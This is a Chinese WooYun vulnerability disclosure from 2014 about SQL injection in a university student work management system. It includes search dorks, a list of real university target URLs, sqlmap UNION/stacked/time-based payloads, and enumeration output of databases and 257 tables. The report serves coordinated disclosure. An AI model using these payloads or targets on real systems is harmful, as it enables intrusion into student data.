当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-054213

漏洞标题:某高校管理系统存在通用型SQL注入漏洞

相关厂商:西安奥达软件工程有限公司

漏洞作者: Mr.leo

提交时间:2014-03-27 11:30

修复时间:2014-06-25 11:30

公开时间:2014-06-25 11:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-03-27: 细节已通知厂商并且等待厂商处理中
2014-04-01: 厂商已经确认,细节仅向厂商公开
2014-04-04: 细节向第三方安全合作伙伴开放
2014-05-26: 细节向核心白帽子及相关领域专家公开
2014-06-05: 细节向普通白帽子公开
2014-06-15: 细节向实习白帽子公开
2014-06-25: 细节向公众公开

简要描述:

某高校管理系统存在通用型SQL注入漏洞

详细说明:

西安奥达软件工程有限公司旗下高校学生工作管理系统前台及后台均存在注入漏洞
1、高校学生工作管理系统前台
intitle:学生工作管理系统 Login/List.aspx?ID=

530.jpg


http://202.117.112.29/login/List.aspx?ID=10
http://xg.chd.edu.cn/Login/List.aspx?ID=99
http://xg.snnu.edu.cn/Login/List.aspx?ID=99
http://202.200.16.19/login/List.aspx?ID=99
http://202.200.168.108/Login/List.aspx?ID=99
以http://xg.snnu.edu.cn/Login/List.aspx?ID=99为例
sqlmap identified the following injection points with a total of 100 HTTP(s) requests:
---
Place: POST
Parameter: txtUserId
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtUserId
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+CHAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58), NULL-- &txtPwd=1&RadioButtonList1=1&Button1=登 录
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=登 录
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJCAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=登 录
---
current user: 'auda'
current database: 'StudWorkXiDian'
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] StudWorkXiDian
[*] tempdb
可跨库
Database: pubs
[14 tables]
+----------------------+
| [dbo/awthors] |
| [dbo/discounts] |
| [dbo/employee] |
| [dbo/jobs] |
| [dbo/pwb_info] |
| [dbo/pwblishers] |
| [dbo/roysched] |
| [dbo/sales] |
| [dbo/stores\t] |
| [dbo/sysconstraints] |
| [dbo/syssegments] |
| [dbo/titleawthor] |
| [dbo/titles\r\t] |
| [dbo/titleview] |
+----------------------+
2、高校学生工作管理系统后台
关键字:inurl:/Login/loginpageforuserb.aspx
http://202.117.112.29/Login/loginpageforuserb.aspx
http://xg.chd.edu.cn/Login/loginpageforuserb.aspx
http://xg.snnu.edu.cn/Login/loginpageforuserb.aspx
http://202.200.16.19/Login/loginpageforuserb.aspx
http://202.200.168.108/Login/loginpageforuserb.aspx
http://job.xaufe.edu.cn/Login/loginpageforuserb.aspx
http://219.244.0.28/Login/loginpageforuserb.aspx
http://202.118.166.23/Login/loginpageforuserb.aspx
http://xsc.caac.net/Login/loginpageforuserb.aspx
以http://202.117.112.29/Login/loginpageforuserb.aspx为例
用户名处没有过滤(txtUserId),导致注射
burp抓包
POST http://202.117.112.29/Login/loginpageforuserb.aspx HTTP/1.1
Host: 202.117.112.29
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://202.117.112.29/Login/loginpageforuserb.aspx
Cookie: ASP.NET_SessionId=oj5sbgn3ovvansabkijagoaz
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 719
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTk4Njc5NTU4Mg9kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj%2BS4jeiDveS4uuepugril4%2FlhYHorrjmnIDlpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi%2Bk%2BWFpeiLseaWh%2BWNleW8leWPtycKHwECCmRkZI%2B9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=%2FwEWBwLo5YDJCAKz8dy8BQKd%2B7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txtUserId=1&txtPwd=1&RadioButtonList1=1&Button1=%E7%99%BB+%E5%BD%95
Place: POST
Parameter: txtUserId
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9
kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpP
lhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leW
PtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU
9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnID
lpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+W
NleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJ
CAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txt
UserId=1' UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(98)+CHAR(104)+C
HAR(120)+CHAR(58)+CHAR(86)+CHAR(105)+CHAR(99)+CHAR(109)+CHAR(119)+CHAR(79)+CHAR(
68)+CHAR(83)+CHAR(71)+CHAR(79)+CHAR(58)+CHAR(120)+CHAR(112)+CHAR(112)+CHAR(58),
NULL-- &txtPwd=1&RadioButtonList1=1&Button1=? ?
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9
kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpP
lhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leW
PtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU
9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnID
lpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+W
NleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJ
CAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txt
UserId=1'; WAITFOR DELAY '0:0:5';--&txtPwd=1&RadioButtonList1=1&Button1=? ?
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKMTk4Njc5NTU4Mg9
kFgICAw9kFgQCAQ8PFgQeB1Rvb2xUaXAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnIDlpJrovpP
lhaXlrZfnrKbmlbA6MzAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+WNleW8leW
PtycKHglNYXhMZW5ndGgCHhYCHglvbmtleWRvd24FMWphdmFzY3JpcHQ6IGlmKGV2ZW50LmtleUNvZGU
9PTEzKWV2ZW50LmtleUNvZGU9OTtkAgMPDxYEHwAFYuKXj+S4jeiDveS4uuepugril4/lhYHorrjmnID
lpJrovpPlhaXlrZfnrKbmlbA6MTAK4peP5q2j56Gu5qC85byPOuS4jeWFgeiuuOi+k+WFpeiLseaWh+W
NleW8leWPtycKHwECCmRkZI+9NsB7KY0t2kYS4plm3wayLkau&__EVENTVALIDATION=/wEWBwLo5YDJ
CAKz8dy8BQKd+7qdDgL444i9AQL544i9AQL3jKLTDQKM54rGBpRQKLPGwwZ77hXVwLb83lpgACQP&txt
UserId=1' WAITFOR DELAY '0:0:5'--&txtPwd=1&RadioButtonList1=1&Button1=? ?
---
[15:36:02] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
[15:36:02] [INFO] fetching current user
current user: 'auda'
[15:36:02] [INFO] fetching current database
current database: 'StudWorkXiDian'
[15:36:02] [INFO] fetching database names
[15:36:02] [INFO] the SQL query used returns 7 entries
[15:36:02] [INFO] resumed: "master"
[15:36:02] [INFO] resumed: "model"
[15:36:02] [INFO] resumed: "msdb"
[15:36:02] [INFO] resumed: "Northwind"
[15:36:02] [INFO] resumed: "pubs"
[15:36:02] [INFO] resumed: "StudWorkXiDian"
[15:36:02] [INFO] resumed: "tempdb"
available databases [7]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] StudWorkXiDian
[*] tempdb
257张表
Database: StudWorkXiDian
[257 tables]
+-------------------------------+
| dbo.LogTemp |
| dbo.Test |
| dbo.Vstipend_ApplyInfo |
| dbo.Vsubsidy_ApplyInfo |
| dbo.[tsys_Modules_测试] |
| dbo.dtproperties |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.tAcc_File |
| dbo.tAppoinmentRelation |
| dbo.tAppointment |
| dbo.tAppointmentType |
| dbo.tAppointmentTypeExplain |
| dbo.tArr_Accessories |
| dbo.tArr_ArrType |
| dbo.tArr_Auditing |
| dbo.tArr_requiteType |
| dbo.tCadre_InWork |
| dbo.tCadre_OutWork |
| dbo.tCadre_StudWork |
| dbo.tDorm_Area |
| dbo.tDorm_Bed |
| dbo.tDorm_Building |
| dbo.tDorm_ChargeHistory |
| dbo.tDorm_History |
| dbo.tDorm_RewardHistory |
| dbo.tDorm_Room |
| dbo.tDorm_RoomMaster |
| dbo.tDorm_RoomType |
| dbo.tDrom_BuildingUser |
| dbo.tFile_Video |
| dbo.tGB_GMZ |
| dbo.tGB_HYZK |
| dbo.tGB_JKZK |
| dbo.tGB_SJGGHDQ |
| dbo.tGB_XB |
| dbo.tGB_XW |
| dbo.tGB_XZQH |
| dbo.tGB_ZZMM |
| dbo.tJQRY_Apply |
| dbo.tJQRY_SP |
| dbo.tJQRY_Type |
| dbo.tOther_ArcAgent |
| dbo.tOther_ArcBase |
| dbo.tOther_ArcContent |
| dbo.tOther_ArcItem |
| dbo.tOther_ArcTurnOver |
| dbo.tPoor_Student |
| dbo.tPopedom_Atom |
| dbo.tReg_register |
| dbo.tReplyAppointment |
| dbo.tSchoolLoanLevel |
| dbo.tSchoolLoanProportion |
| dbo.tSchoolLoanRefund |
| dbo.tSchoolLoans |
| dbo.tStudCadre_Info |
| dbo.tStudCadre_Type |
| dbo.tStudCadre_Unit |
| dbo.tStud_AllowApply |
| dbo.tTemp_Apply |
| dbo.tarm_AwardList |
| dbo.tarm_CentType |
| dbo.tarm_StudCourse |
| dbo.tarm_StudLevy |
| dbo.tarm_StudRecord |
| dbo.tarm_policy |
| dbo.tarr_Info |
| dbo.tarr_repay |
| dbo.tasl_Affirm |
| dbo.tasl_Bank |
| dbo.tasl_BankAuditing |
| dbo.tasl_BankBargain |
| dbo.tasl_Breach |
| dbo.tasl_End |
| dbo.tasl_Extend |
| dbo.tasl_Familial |
| dbo.tasl_Imburse |
| dbo.tasl_LoanType |
| dbo.tasl_Postponed |
| dbo.tasl_SchoolAuditing |
| dbo.tasl_SchoolAuditingIdea |
| dbo.tasl_StudRequisition |
| dbo.tasl_Whither |
| dbo.tbase_Department |
| dbo.tbase_Teacher |
| dbo.tbase_User |
| dbo.tcgt_StudCourse2 |
| dbo.tcgt_StudCourse3 |
| dbo.tcgt_StudRecord2 |
| dbo.tcgt_StudRecord3 |
| dbo.tcgt_stdResultCell |
| dbo.tcgt_stdResultCell2 |
| dbo.tcgt_stdResultCell3 |
| dbo.tcgt_stdScale2 |
| dbo.tcgt_stdScale3 |
| dbo.tcmoe_RewardLevel |
| dbo.tcmoe_RewardType |
| dbo.tcmoe_StatusChangeCause |
| dbo.tcmoe_StatusChangeType |
| dbo.tcode_Academic |
| dbo.tcode_BloodType |
| dbo.tcode_CultivateMode |
| dbo.tcode_Educate |
| dbo.tcode_Emigrant |
| dbo.tcode_Job |
| dbo.tcode_LoanState |
| dbo.tcode_Post |
| dbo.tcode_ProSchoolAccount |
| dbo.tcode_PsychologyLevel |
| dbo.tcode_StudType |
| dbo.tcode_TeacherRole |
| dbo.tcode_poorType |
| dbo.tcpt_BranchActivity |
| dbo.tcpt_ClassRelation |
| dbo.tcpt_Document |
| dbo.tcpt_MemberStudy |
| dbo.tcpt_PartyActive |
| dbo.tcpt_PartyBranch |
| dbo.tcpt_PartyMember |
| dbo.tcpt_PartyPrep |
| dbo.tcpt_PersonRelation |
| dbo.tcpt_Requisition |
| dbo.terr_Accessories |
| dbo.terr_Auditing |
| dbo.terr_Auditing2 |
| dbo.terr_ErrCause |
| dbo.terr_ErrInfo |
| dbo.terr_ErrType |
| dbo.terr_PunishType |
| dbo.terr_Remove |
| dbo.titem_PartyBranchType |
| dbo.titem_PartyMemberType |
| dbo.titem_PartySchoolType |
| dbo.tmem_BookEnrol |
| dbo.tmem_ChooseCadre |
| dbo.tmem_Development |
| dbo.tmem_DevelopmentNum |
| dbo.tmem_MemBerDocment |
| dbo.tmem_MemCharge |
| dbo.tmem_Member |
| dbo.tmem_OrgType |
| dbo.tmem_Party |
| dbo.tmem_PartyNum |
| dbo.tmem_Record |
| dbo.tmem_Rewards |
| dbo.tmem_TrainDepartment |
| dbo.tmem_TrainManInfo |
| dbo.tmem_orgMan |
| dbo.tmem_organization |
| dbo.tmema_ActivityApply |
| dbo.tmema_ActivityAudit |
| dbo.tmema_ActivityField |
| dbo.tmema_AssnJob |
| dbo.tmema_AssnMember |
| dbo.tmemp_Activity |
| dbo.tmemp_ComAuthor |
| dbo.tmemp_ComManuscript |
| dbo.tmemp_ComReport |
| dbo.tmemp_PublicationIssue |
| dbo.tmemp_PulicJob |
| dbo.tpopedom_UserBackManage |
| dbo.tpopedom_UserModule |
| dbo.treward_Information |
| dbo.treward_InformationG |
| dbo.treward_TypeG |
| dbo.tsafety_InsurePayforMoney |
| dbo.tsafety_InsureRegStudent |
| dbo.tsafety_SafetyGrade |
| dbo.tsafety_Type |
| dbo.tschol_Annotion |
| dbo.tschol_Apply |
| dbo.tschol_Classify |
| dbo.tschol_Quotas |
| dbo.tschol_RankObj |
| dbo.tssc_History |
| dbo.tstipend_Annotion |
| dbo.tstipend_Apply |
| dbo.tstipend_Apply_Temp |
| dbo.tstipend_Classify |
| dbo.tstipend_Quotas |
| dbo.tstipend_RankObj |
| dbo.tstud_Accessories |
| dbo.tstud_CardPrint |
| dbo.tstud_CardPrintFiled |
| dbo.tstud_Family |
| dbo.tstud_FieldEdit |
| dbo.tstud_Student_BKS |
| dbo.tstud_Student_Temp_BKS |
| dbo.tstud_Student_Temp_YJS |
| dbo.tstud_Student_YJS |
| dbo.tsubsidy_Annotion |
| dbo.tsubsidy_Apply |
| dbo.tsubsidy_Apply_Temp |
| dbo.tsubsidy_Classify |
| dbo.tsubsidy_Quotas |
| dbo.tsubsidy_RankObj |
| dbo.tsys_Download |
| dbo.tsys_FriendlyLink |
| dbo.tsys_Notice |
| dbo.tsys_NoticeType |
| dbo.tsys_Options |
| dbo.tsys_VoteList |
| dbo.tsys_VoteProject |
| dbo.tsys_VoteRen |
| dbo.tsys_loginLog |
| dbo.tsys_loginSession |
| dbo.twork_Apply |
| dbo.twork_Apply_Temp |
| dbo.twork_CheckIn |
| dbo.twork_Department |
| dbo.twork_PayMoney |
| dbo.twork_PostObj |
| dbo.twork_PostType |
| dbo.txm_PYFS |
| dbo.txm_SS |
| dbo.txm_XL |
| dbo.txm_XSLX |
| dbo.txm_XSZT |
| dbo.vAloan_ListAff |
| dbo.vAloan_ListBasic |
| dbo.vAloan_ListExtend |
| dbo.vArr_ApplyInfo_BKS |
| dbo.vArr_ApplyInfo_YJS |
| dbo.vCadreGroup_state |
| dbo.vDorm_AllRoomDetail |
| dbo.vDorm_Bed |
| dbo.vDorm_BuidingCode |
| dbo.vDorm_CanBePreared |
| dbo.vDorm_CanUseBed |
| dbo.vDorm_Preared |
| dbo.vDorm_UsedBed |
| dbo.vDorm_building |
| dbo.vDorm_room |
| dbo.vDorm_student |
| dbo.vSchol_QuotaForDept |
| dbo.vSchoolLoans_BKS |
| dbo.vbase_Department |
| dbo.vcgt_StudSumRecord2 |
| dbo.vcgt_StudSumRecord3 |
| dbo.vcgt_student |
| dbo.vparty_PersonRelation |
| dbo.vparty_StatBranchSum |
| dbo.vpopedom_UserModule |
| dbo.vschol_QuotaForClass |
| dbo.vstipend_Classify |
| dbo.vstipend_QuotaForClass |
| dbo.vstipend_QuotaForDept |
| dbo.vstipend_QuotaForGrade |
| dbo.vstud_Student_BKS |
| dbo.vstud_Student_Temp_BKS |
| dbo.vstud_Student_YJS |
| dbo.vsubsidy_Classify |
| dbo.vsubsidy_QuotaForClass |
| dbo.vsubsidy_QuotaForDept |
| dbo.vsubsidy_QuotaForGrade |
| dbo.vtstud_Student_Temp_YJS |
| dbo.vwork_Department |
+-------------------------------+

漏洞证明:

已经证明

修复方案:

过滤多个参数

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-04-01 09:12

厂商回复:

CNVD确认并复现所述多个实例情况,验证和处置工作均由CNCERT转发给上海交通大学网络信息中心完成。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-03-27 14:05 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])

    消灭0回复

  2. 2014-03-27 14:20 | Mr.leo ( 普通白帽子 | Rank:1314 漏洞数:176 | 说点神马呢!!)

    @zzR 你的使命很神圣啊